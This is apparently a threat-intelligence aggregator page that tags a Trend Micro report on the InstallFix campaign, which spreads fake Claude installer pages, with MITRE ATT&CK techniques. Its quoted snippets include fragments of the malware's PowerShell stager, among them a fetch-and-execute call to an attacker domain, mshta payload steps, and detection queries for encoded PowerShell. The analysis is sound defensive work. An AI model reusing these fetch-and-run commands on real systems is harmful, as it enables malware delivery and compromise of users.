TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Trend Micro Research

InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise

Mohamed Fahmy · 1 day ago · Read original ↗

ATT&CK techniques detected

29 predictions
T1027Obfuscated Files or Information
100%
“: / / $ nipple [. ] oakenfjrod [. ] ru / cloude - 91267b64 - 989f - 49b4 - 89b4 - 984e0154d4d1 ) - < nipple > - md5 - based machine id - oakenfjrod. ru - attacker - controlled domain - / cloude -... - remote payload path during the fourth stage of execution ( cloude - 91267b64 - …”
T1059.001PowerShell
99%
“single archive. this archive appears to hold a normal file. the contents of the file appear to consist of normal file components. at this stage, nothing obviously malicious or unusual is observed in the extracted files, and they resemble a standard application. the embedded html …”
T1027Obfuscated Files or Information
99%
“the deobfuscation process, the first character was decoded to derive the key required for further decryption. this step serves as an example of the underlying logic used to reconstruct the full payload from its obfuscated form. logic to get the xor key - combine numbers and remov…”
T1059.001PowerShell
99%
“##swow64 powershell binary with a utf - 16le base64 - encoded payload via the - e flag. the decoded powershell stager performs the following operations in sequence : - victim fingerprinting : computes md5 ( computername + username ), takes the first 16 hex characters in lowercase…”
T1059.001PowerShell
98%
“( iex ) # decoded powershell stager logic ( reconstructed from base64 telemetry ) # step 1 victim fingerprint $ nipple = ( get - filehash - inputstream ( [ io. memorystream ] : : new ( [ text. encoding ] : : utf8. getbytes ( $ env : computername + $ env : username ) ) ) - algorit…”
T1059.001PowerShell
96%
“##sphtmlwindow2. resizeto ( 0, 0 ) call ensures the mshta window remains invisible to the user throughout execution. amsi telemetry confirmed the vbscript executed within the mshta. exe process context and captured the decoded com call sequence. stage 4 : cmd. exe reconstructs po…”
T1027Obfuscated Files or Information
92%
“##sphtmlwindow2. resizeto ( 0, 0 ) call ensures the mshta window remains invisible to the user throughout execution. amsi telemetry confirmed the vbscript executed within the mshta. exe process context and captured the decoded com call sequence. stage 4 : cmd. exe reconstructs po…”
T1218.005Mshta
92%
“presents an os - specific command and instructs the user to run it framing execution as a required installation step. on windows, executing the command causes the browser or shell to invoke mshta. exe against the remote payload url. stage 2 : mshta fetches and executes zip / hta …”
T1053.005Scheduled Task
85%
“part of its deobfuscation or evasion technique. with the xor key now obtained, we can proceed to deobfuscate the encoded bytes and continue with further analysis of the payload. based on the decryption routine, the data is first converted from decimal and base64 formats, then xor…”
T1105Ingress Tool Transfer
72%
“stage - 4 fetch and execute $ filter = ( new - object net. webclient ). downloadstring ( " https : / / $ nipple. oakenfjrod [. ] ru / cloude - 91267b64 - 989f - 49b4 - 89b4 - 984e0154d4d1 " ) iex $ filter the victim - unique subdomain ( 16 - character hex derived from machine ide…”
T1218.005Mshta
70%
“an archive file with ' pk ' magic bytes ), while mshta. exe reads the hta content appended at the end of the file. this dual - format structure allows the file to pass as a benign package while mshta. exe executes the appended malicious hta directly. process chain observed in tel…”
T1059.001PowerShell
69%
“- f51f - 4de8 - 95a4 - f561cc55ebc4 the appended hta executes vbscript silently inside mshta. exe. the script uses two named decoding functions to deobfuscate its payload before launching the next stage : - displayemailgnu ( ) - hex - decodes obfuscated strings embedded in the ht…”
T1059.001PowerShell
69%
“or processname : cscript. exe ) encoded powershell / iex in command line eventsubid : telemetry _ process _ create and processname : powershell. exe and ( processcmd : * - enc * or processcmd : * - encodedcommand * or processcmd : * iex * or processcmd : * invoke - expression * o…”
T1189Drive-by Compromise
69%
“running commands ( for example, “ curl - to - bash ” ), attackers take advantage of this behavior by creating fake but realistic installation pages. these pages trick users into executing malicious commands, leading to malware infections. the threat is especially significant beca…”
T1071.001Web Protocols
68%
“[. ] 177 [. ] 239 [. ] 255. tcp send and tcp receive activity was observed on the infected host. this indicates that the malware is actively establishing network connections and exchanging data with external systems. such activity suggests potential communication with command - a…”
T1218.005Mshta
66%
“- f51f - 4de8 - 95a4 - f561cc55ebc4 the appended hta executes vbscript silently inside mshta. exe. the script uses two named decoding functions to deobfuscate its payload before launching the next stage : - displayemailgnu ( ) - hex - decodes obfuscated strings embedded in the ht…”
T1027.010Command Obfuscation
47%
“##sphtmlwindow2. resizeto ( 0, 0 ) call ensures the mshta window remains invisible to the user throughout execution. amsi telemetry confirmed the vbscript executed within the mshta. exe process context and captured the decoded com call sequence. stage 4 : cmd. exe reconstructs po…”
T1204.002Malicious File
43%
“installfix and claude code : how fake install pages lead to real compromise cyber threats installfix and claude code : how fake install pages lead to real compromise targeting multiple industries worldwide, the installfix campaign uses fake claude ai installer pages to trick user…”
T1059.001PowerShell
39%
“an archive file with ' pk ' magic bytes ), while mshta. exe reads the hta content appended at the end of the file. this dual - format structure allows the file to pass as a benign package while mshta. exe executes the appended malicious hta directly. process chain observed in tel…”
T1218.005Mshta
37%
“: mshta. exe and ( processcmd : * 1 - 5 - 8 [. ] com * or processcmd : * msixbundle * or processcmd : * get - version [. ] com * ) / / step 2 : pivot on endpointhostname from above — find ps child and c2 beacon endpointhostname : < hostname _ from _ step1 > and ( ( eventsubid : t…”
T1059Command and Scripting Interpreter
37%
“##sphtmlwindow2. resizeto ( 0, 0 ) call ensures the mshta window remains invisible to the user throughout execution. amsi telemetry confirmed the vbscript executed within the mshta. exe process context and captured the decoded com call sequence. stage 4 : cmd. exe reconstructs po…”
T1204.002Malicious File
36%
“single archive. this archive appears to hold a normal file. the contents of the file appear to consist of normal file components. at this stage, nothing obviously malicious or unusual is observed in the extracted files, and they resemble a standard application. the embedded html …”
T1059.005Visual Basic
35%
“##sphtmlwindow2. resizeto ( 0, 0 ) call ensures the mshta window remains invisible to the user throughout execution. amsi telemetry confirmed the vbscript executed within the mshta. exe process context and captured the decoded com call sequence. stage 4 : cmd. exe reconstructs po…”
T1202Indirect Command Execution
35%
“an archive file with ' pk ' magic bytes ), while mshta. exe reads the hta content appended at the end of the file. this dual - format structure allows the file to pass as a benign package while mshta. exe executes the appended malicious hta directly. process chain observed in tel…”
T1059Command and Scripting Interpreter
34%
“an archive file with ' pk ' magic bytes ), while mshta. exe reads the hta content appended at the end of the file. this dual - format structure allows the file to pass as a benign package while mshta. exe executes the appended malicious hta directly. process chain observed in tel…”
T1204.002Malicious File
34%
“presents an os - specific command and instructs the user to run it framing execution as a required installation step. on windows, executing the command causes the browser or shell to invoke mshta. exe against the remote payload url. stage 2 : mshta fetches and executes zip / hta …”
T1204.004Malicious Copy and Paste
33%
“running commands ( for example, “ curl - to - bash ” ), attackers take advantage of this behavior by creating fake but realistic installation pages. these pages trick users into executing malicious commands, leading to malware infections. the threat is especially significant beca…”
T1059.005Visual Basic
32%
“an archive file with ' pk ' magic bytes ), while mshta. exe reads the hta content appended at the end of the file. this dual - format structure allows the file to pass as a benign package while mshta. exe executes the appended malicious hta directly. process chain observed in tel…”
T1059.001PowerShell
31%
“##hell and mshta to execute and install a counterfeit claude application on windows systems and macos systems, though the buttons on the fake website seem to not work. the malvertising url is designed to mimic a google ads link structure. the parameters gar _ source and gad _ cam…”

Summary

Targeting multiple industries worldwide, the InstallFix campaign uses fake Claude AI installer pages to trick users into running malware that collects system information, disables security features, achieves persistence, and connects to attacker-controlled C&C servers for additional payloads.